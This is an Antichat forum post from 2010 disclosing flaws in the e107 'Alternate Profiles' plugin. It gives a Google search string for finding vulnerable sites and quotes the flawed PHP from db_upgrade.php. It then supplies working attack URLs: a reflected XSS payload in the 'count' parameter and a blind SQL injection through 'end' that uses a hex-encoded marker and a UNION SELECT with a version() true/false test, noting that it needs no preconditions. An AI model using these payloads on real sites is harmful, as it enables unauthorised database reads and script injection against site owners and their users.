05.05.2010, 18:49
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Alternate Profiles
выкачал отсюдо
гугл- inurl:e107_plugins/alternate_profiles
./e107_plugins/alternate_profiles/db_upgrade.php
PHP код:
...
if(isset($_GET['con'])) {
$start = $_GET['start'];
$end = $_GET['end'];
$query = mysql_query("SELECT * FROM ".MPREFIX."alternate_profiles LIMIT $start,$end");
$rows = mysql_num_rows($query);
if (isset($_GET['count'])) {
$count = $_GET['count'];
$first = $_GET['start'] - 2;
echo "Users #".$first." to #".$count." have been updated.<br/>";
} else {...
PHP код:
...$split = explode("[||]",$row['user_custompage']);
if ($split[0] == "0019283") {
$array = Array();
$array['Mood'] = $split[1];
$array['Status'] = $split[2];
$array['Orientation'] = $split[3];
$array['Hometown'] = $split[4];
$array['Ethnicity'] = $split[5];
$array['Occupation'] = $split[6];
$array['Music'] = $split[7];
$array['Films/Television'] = $split[8];
$array['Favourite_Books'] = $split[9];
$array['aboutme'] = $split[10];
$db = serialize($array);
mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_custompage='".$db."', user_simple='1' WHERE user_id=".$row['user_id']." ");
unset($array);
$count++;
echo "Updated user #".$row['user_id']."<br/>";
} else {
mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_simple='0' WHERE user_id=".$row['user_id']." ");
}...
Результат:
passive XSS
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1&count=<script>ale rt(123)</script>
blind SQL inj
чтоб крутить в результат первого запроса надо впихнуть:0019283[||], ну понятно лучше захексить, чтоб обойти кавычки ):
Пусть 5 вертка
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=5
A total of 1 profiles have been upgraded - true
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=4
A total of 0 profiles have been upgraded - false
плюс - никаких условий
|
|
|